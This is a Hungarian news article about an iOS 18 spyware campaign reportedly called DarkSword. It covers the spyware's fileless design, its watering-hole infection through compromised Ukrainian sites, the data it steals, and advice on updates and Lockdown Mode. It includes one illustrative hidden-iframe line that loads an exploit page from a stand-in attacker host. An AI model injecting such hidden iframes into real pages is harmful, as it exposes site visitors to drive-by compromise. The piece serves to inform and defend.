A Google és biztonsági kutatók egy új, DarkSword nevű kifinomult kémprogramot azonosítottak, amely böngészőalapú exploitokon keresztül kompromittálja az iOS 18-at futtató eszközöket.
Az okostelefonok elleni célzott támadások világa szintet lépett. Míg korábban a Pegasushoz hasonló kémeszközöket szinte kizárólag állami szereplők használták szűk célpontcsoportok ellen, a most azonosított DarkSword kampány a tömeges fertőzésre optimalizált „watering hole” (itatóhely) taktikát alkalmazza. A Google Threat Analysis Group (TAG), a Lookout és az iVerify közös jelentése szerint a kártevő több százmillió eszközt veszélyeztethet világszerte.
A láthatatlan penge: Fájlmentes architektúra
A DarkSword technikai értelemben vett legérdekesebb jellemzője a fileless (fájlmentes) működési mód. A hagyományos kártevőkkel ellentétben, amelyek binárisokat írnak a háttértárra, a DarkSword kizárólag a rendszermemóriában (RAM) létezik, és legitim operációs rendszer folyamatokat (process) térít el a saját céljaira.
Ez a megközelítés drasztikusan megnehezíti a detektálást, mivel:
- Nincsenek gyanús fájlok a fájlrendszerben.
- A kártevő a feladat elvégzése (adatlopás) után egyszerűen törli magát a memóriából, nem hagyva maga után digitális lábnyomot.
- Kihasználja az iOS belső sandbox mechanizmusait, de ahelyett, hogy brute-force módszerrel törne át rajtuk, a rendszer saját API-jait használja az adatok eléréséhez.
A fertőzési vektor: Malicious Iframe
A támadás nem igényel felhasználói interakciót a weboldal megnyitásán túl (zero-click jellegű beágyazás). A kutatók több tucat kompromittált ukrán híroldalt és kormányzati portált azonosítottak, amelyekbe a támadók kártékony <iframe> elemeket injektáltak. Amint egy sebezhető iPhone-ról megnyitják az oldalt, az exploit lánc automatikusan lefut.
<!-- Koncepcionális példa a kártékony iframe beágyazásra -->
<iframe src="https://evil-command-server.com/exploit.html" style="display:none; visibility:hidden;"></iframe>
Az exploit lánc kifejezetten a Safari böngészőmotorjának (WebKit) sebezhetőségeit célozza meg, hogy távoli kódvégrehajtást (RCE) érjen el, majd eszkalálja a jogosultságokat a kernel szintjéig.
Célkeresztben az iOS 18
A DarkSword kampány precízen meghatározott szoftverkörnyezetet céloz. Bár az Apple a legújabb frissítéseiben már foltozta a kritikus réseket, a statisztikák szerint a felhasználók jelentős része (kb. 24%) még mindig elavult verziókat futtat.
| Specifikáció | Részletek |
|---|---|
| Érintett verziók | iOS 18.4 – iOS 18.6.2 |
| Becsült kitettség | 220 – 270 millió eszköz |
| Támadási vektor | WebKit exploit (Safari / In-app browser) |
| Adatlopási profil | Üzenetek (iMessage, WhatsApp, Telegram), Fotók, Kriptotárcák, Egészségügyi adatok |
| Kapcsolódó eszközök | Coruna toolkit |
Mérnöki hanyagság a támadói oldalon
Érdekes módon a DarkSword felfedezését a támadók – feltételezhetően orosz állami kötődésű csoportok – súlyos biztonsági hibája segítette elő. A kutatók megtalálták a kártevő teljes forráskódját az egyik parancsnoki (C2) szerveren, amely ráadásul bőséges, angol nyelvű kommentárokkal volt ellátva. Ez a „DarkSword” elnevezést is tartalmazó dokumentáció lehetővé tette a biztonsági cégek számára, hogy pontosan megértsék a kód logikáját és az exfiltrációs protokollokat.
Exfiltrációs profil: Mit visz a „Sötét Kard”?
A DarkSword nem csupán kémkedésre, hanem direkt anyagi haszonszerzésre is alkalmas. A kód elemzése során kiderült, hogy a szoftver célzottan keresi a kriptovaluta-tárcák privát kulcsait és hitelesítő adatait. Emellett hozzáfér az alábbiakhoz:
- Kommunikációs naplók: iMessage, WhatsApp és Telegram adatbázisok.
- Személyes adatok: Naptárbejegyzések, jegyzetek és a Health app szenzitív adatai.
- Média: Fotók és videók exfiltrálása.
- Böngészési előzmények: Safari history és mentett jelszavak.
Konklúzió és védekezés
A DarkSword esete rávilágít arra, hogy az iOS zárt ökoszisztémája sem nyújt abszolút védelmet a kifinomult, memóriaszinten operáló támadások ellen. A fenyegetés elsősorban azokat érinti, akik elmaradtak a szoftverfrissítésekkel.
Mérnöki ajánlás:
1. Azonnali frissítés: Minden iOS 18-at futtató eszközt a legfrissebb elérhető verzióra kell frissíteni (az Apple már kiadta a javításokat).
2. Lockdown Mode: Magas kockázatú környezetben (újságírók, diplomaták, IT adminisztrátorok) javasolt az iOS „Karantén módjának” aktiválása, amely blokkolja a komplex webes technológiákat, így az exploitok többségét is.
3. Safari Safe Browsing: Ellenőrizzük, hogy a Safari biztonsági beállításai aktívak-e, mivel az Apple már feketelistára tette a Google által azonosított kártékony domaineket.
A DarkSword megjelenése jelzi: a kereskedelmi és állami kémszoftverek közötti határvonal elmosódik, és a jövőben egyre több „fájlmentes” támadásra kell számítanunk mobil platformokon is.
